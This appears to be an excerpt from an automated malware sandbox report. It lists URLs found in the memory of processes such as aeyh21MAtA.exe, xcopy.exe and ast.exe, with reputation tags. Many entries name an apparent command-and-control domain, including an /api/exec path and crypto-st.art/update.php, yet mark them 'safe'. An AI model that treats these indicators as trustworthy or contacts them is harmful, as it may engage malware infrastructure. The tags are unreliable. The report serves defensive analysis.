                                  http://www.borland.com/namespaces/Typesuiast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443mUbxast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.borland.com/namespaces/Typesw_sas3Yast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443gast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3342382296.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443fast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443iast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443hast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://id.xn--80akicokc0aablc.xn--p1ai:443kast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103917817.0000000005D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0raeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.indyproject.org/is-TBGHD.tmp.4.drfalse
                                      		high
                                      http://www.kngstr.com/?PreDefines.ishAboutaeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2075277683.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.0000000002385000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2079075667.0000000003250000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023D5000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:44335i:443yast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:44335......ast.exe, 0000000A.00000002.3348750365.000000000337B000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:443JVast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3222862221.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097910899.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087444966.0000000005D97000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074037085.0000000005D76000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224020822.0000000005D99000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178707233.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081842391.0000000005D98000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3363176686.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3338883178.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:443Uast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://id.xn--80akicokc0aablc.xn--p1ai:44335/ast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://curl.haxx.se/docs/http-cookies.html#ast.exefalse
                                          		high
                                          https://datatracker.ietf.org/ipr/1526/ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drfalse
                                            		high
                                            https://id.xn--80akicokc0aablc.xn--p1ai:44335-ast.exe, 0000000A.00000002.3348750365.0000000003382000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3018890151.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.borland.com/namespaces/Typesteast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://id.xn--80akicokc0aablc.xn--p1ai:44ast.exe, 0000000A.00000003.3264857508.0000000005D65000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://id.xn--80akicokc0aablc.xn--p1ai:44396ast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://id.xn--80akicokc0aablc.xn--p1aiCYast.exe, 0000000A.00000003.3020160381.0000000000E1A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://curl.haxx.se/docs/copyright.htmlDast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drfalse
                                                  		high
                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443Kast.exe, 0000000A.00000003.3196760907.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://crl.globalsign.ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443/Logast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443/ast.exe, 0000000A.00000002.3342382296.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141347725.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196167078.0000000005D83000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443.ast.exe, 0000000A.00000003.3265913117.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.3361561204.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443CBOsast.exe, 0000000A.00000003.2953188361.0000000005D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://id.xn--80akicokc0aablc.xn--p1ai:4439ast.exe, 0000000A.00000003.3275116176.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://id.xn--80akicokc0aablc.xn--p1ai:4438ast.exe, 0000000A.00000003.3275116176.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3103307205.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3178902749.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3097543299.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3087531277.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2943967677.0000000005D6C000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2988161968.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2997820752.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141777377.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3029895127.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3233924677.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3340187350.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3196760907.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3318115880.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3061792900.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3074429948.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224217384.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://id.xn--80akicokc0aablc.xn--p1ai443...ast.exe, 0000000A.00000002.3348750365.0000000003374000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://id.xn--80akicokc0aablc.xn--p1ai:443rVast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.innosetup.com/aeyh21MAtA.exe, 00000000.00000003.2076621419.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000000.00000003.2076256080.00000000023B0000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000000.2077569649.0000000000401000.00000020.00000001.01000000.00000004.sdmpfalse
                                                              		high
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443iVfyast.exe, 0000000A.00000003.3030679576.0000000005D7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443uVast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443tsast.exe, 0000000A.00000003.2988161968.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akast.exe, 0000000A.00000003.3338883178.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1aivast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://id.xn--80akicokc0aablc.xn--p1aiis-TBGHD.tmp.4.drfalse
                                                                		high
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443$ast.exe, 0000000A.00000003.3178902749.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://id.xn--80akicoast.exe, 0000000A.00000002.3344406161.000000000116C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443l~ast.exe, 0000000A.00000003.2943967677.0000000005D4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://id.xn--80akicokc0aablc.xn--p1ai:443uinast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0saeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                  		high
                                                                  http://www.borland.com/namespaces/Typeswast.exe, 0000000A.00000002.3342382296.0000000000D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://ocsp2.globalsign.ast.exe, 0000000A.00000003.3020160381.0000000000DF2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3264857508.0000000005D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://schemas.xmlsoap.org/soap/encoding/ZZYast.exe, 0000000A.00000002.3342382296.0000000000D30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:44335ast.exe, 0000000A.00000002.3344815019.000000000302B000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443...43ast.exe, 0000000A.00000002.3344815019.0000000003023000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.kngstr.com/?PreDefines.ishaeyh21MAtA.exe, 00000000.00000003.2086829380.00000000021C2000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000001.00000003.2082226241.000000000237E000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.exe, 00000003.00000003.2454108378.00000000021A8000.00000004.00001000.00020000.00000000.sdmp, aeyh21MAtA.tmp, 00000004.00000003.2445177272.00000000023CE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443/AstClnogast.exe, 0000000A.00000003.3081992843.0000000005D83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://id.xn--80akicokc0arast.exe, 0000000A.00000003.3318115880.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443:Vast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://id.xn--80akicokc0aablc.xn--p1aiIZast.exe, 0000000A.00000002.3342382296.0000000000E1D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3224328789.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3266592381.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3276265728.0000000000E19000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://datatracker.ietf.org/ipr/1524/ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drfalse
                                                                          		high
                                                                          https://id.xn--80akicokc0aablc.xn--p1aid003ast.exe, 0000000A.00000002.3344815019.0000000003064000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://id.xn--80akicokc0aablc.xn--p1ai:44335/templatepast.exe, 0000000A.00000003.3018890151.0000000005DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://id.xn--80akicokc0aablc.xn--p1aijast.exe, 0000000A.00000003.2783362504.0000000000E10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://crypto-st.art/update.phpast.exe, 0000000C.00000002.2942134917.0000000002BD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.borland.com/namespaces/Typesnuast.exe, 0000000B.00000002.2862003498.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://id.xn--80akicokc0aablc.xn--p1aiiast.exe, 0000000A.00000002.3344815019.0000000003032000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://www.openssl.org/)is-TBGHD.tmp.4.drfalse
                                                                              		high
                                                                              https://id.xn--80akicokc0aablc.xn--p1ai:443VVast.exe, 0000000A.00000003.2997820752.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://ocsp.sectigo.com0aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                                		high
                                                                                http://www.openssl.org/Vaeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2449507358.00000000032AD000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://id.xn--80akicokc0aaast.exe, 0000000A.00000003.3224678358.0000000005D4D000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3288736833.0000000005D96000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3124114421.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2970703441.0000000005D7A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/soap/encoding/rast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#aeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                                      		high
                                                                                      https://id.xn--80akicokc0aablc.xn--p1ai:443AUBast.exe, 0000000A.00000002.3356437009.0000000004418000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://curl.haxx.se/docs/http-cookies.htmlast.exe, ast.exe, 0000000A.00000002.3366386223.000000006B7DB000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drfalse
                                                                                        		high
                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443-0ast.exe, 0000000A.00000003.3103307205.0000000005D7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai:443vUast.exe, 0000000A.00000003.3123499306.0000000005D6E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3275116176.0000000005D96000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://www.borland.com/namespaces/Typesast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.borland.com/namespaces/Typeshast.exe, 0000000C.00000002.2941388188.0000000000D48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://id.xn--80akicokc0aablc.xn--p1ai:44335/api/execast.exe, 0000000A.00000003.2943724764.0000000005D7D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://sectigo.com/CPS0Baeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://id.xn--80akicokc0aablc.xn--p1aihYast.exe, 0000000A.00000003.3124114421.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.3141994540.0000000000E1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://curl.haxx.se/Vast.exe, 0000000A.00000002.3366892781.000000006B7F4000.00000002.00000001.01000000.00000016.sdmp, is-VO31B.tmp.4.drfalse
                                                                                                		high
                                                                                                https://datatracker.ietf.org/ipr/1914/ast.exe, 0000000A.00000000.2714237546.0000000000942000.00000002.00000001.01000000.0000000B.sdmp, is-TBGHD.tmp.4.drfalse
                                                                                                  		high
                                                                                                  https://sectigo.com/CPS0Caeyh21MAtA.tmp, 00000004.00000003.2441306284.000000000710A000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2710683559.0000000003089000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://sectigo.com/CPS0Dxcopy.exe, 00000008.00000003.2447777452.00000000032B5000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2443348648.0000000003271000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2446543838.00000000030A0000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2455052025.0000000003089000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000008.00000003.2454146070.0000000003089000.00000004.00000020.00020000.00000000.sdmp, is-E6DJ2.tmp.4.dr, is-SNDPS.tmp.4.drfalse
                                                                                                      		high
